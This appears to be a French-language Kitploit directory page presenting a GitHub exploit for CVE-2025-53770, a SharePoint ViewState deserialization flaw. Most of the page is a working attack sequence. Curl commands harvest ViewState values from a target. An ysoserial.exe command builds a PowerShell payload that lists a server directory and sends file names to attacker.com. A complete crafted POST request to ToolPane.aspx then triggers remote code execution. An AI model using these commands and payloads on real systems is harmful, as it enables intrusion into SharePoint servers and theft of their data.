Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53770-Exploit — Exploit pour CVE-2025-53770 ciblant la désérialisation ViewState de SharePoint. Utilise ysoserial pour générer une charge utile qui liste les répertoires du serveur et exfiltre les noms de fichiers vers une URL contrôlée par l'attaquant. | Kitploit
Outils/GitHubGitHub/udyz/cve-2025-53770-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCommandement et Contrôle
GitHubudyz/cve-2025-53770-exploit

CVE-2025-53770-Exploit

Exploit pour CVE-2025-53770 ciblant la désérialisation ViewState de SharePoint. Utilise ysoserial pour générer une charge utile qui liste les répertoires du serveur et exfiltre les noms de fichiers vers une URL contrôlée par l'attaquant.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 1 anPas encore vérifié

CVE-2025-53770-Exploit

Tout d'abord, récupérez les valeurs __VIEWSTATEGENERATOR, VALIDATION_KEY et VALIDATION_ALG de la page SharePoint cible :

root@kitploit:~
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
curl https://target.com/_layouts/15/spinstall0.aspx

Ensuite, créez une charge utile PowerShell ViewState à l'aide de ysoserial.exe qui liste un répertoire sur le serveur et envoie les noms de fichiers vers une URL externe :

root@kitploit:~
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

Enfin, ajoutez le jeton généré à une requête POST comme celle-ci pour exécuter la commande sur le serveur :

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
Télécharger l’outil